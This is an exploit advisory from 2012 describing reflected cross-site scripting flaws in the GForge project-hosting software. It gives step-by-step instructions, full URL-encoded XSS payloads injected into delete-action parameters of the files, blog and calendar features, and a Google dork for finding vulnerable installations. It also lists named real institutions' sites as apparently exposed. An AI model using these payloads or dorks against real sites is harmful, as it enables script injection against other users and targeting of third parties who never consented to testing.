# Exploit Title: GForge Cross Site Scripting # Date: 30.01.2012 # Author: Sony # Software Link: http://gforge.org # Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or another dorks (it's simple) # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html .................................................................. Well, we have interesting xss in the GForge. But we can test it on our accounts. We can made 2 accounts for test. XSS found in the files,calendar,messagewall (search users), blogs.. Files. Upload our file. http://gforge.org/gf/user/eleo/userfiles/ And press button delete and open link in the new window and add in the url our xss. http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[ourxss is here] http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG Test this on your account name. Well, now..blog. Create post and press button delete and open link in the new window and add in the url our xss. gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here] http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG or.. http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG Calendar.. Open calendar and press button "add new event" and ress button delete and open link in the new window and add in the url our xss. http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[ourxss is here] http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG And we have xss in the gf/my/messagewall/ (search users) http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG Also we can see in google that a lot of sites have a gforge and vulnerable to xss. Joomlacode.org http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG Stanford.edu http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG https://code.ros.org/gf/account/?action=UserAdd https://forge.si.umich.edu/gf/account/?action=UserAdd http://media.lbl.gov/gf/account/?action=UserAdd etc.. It's not a critical vulnerability, but it's possible to use if to change url for different users.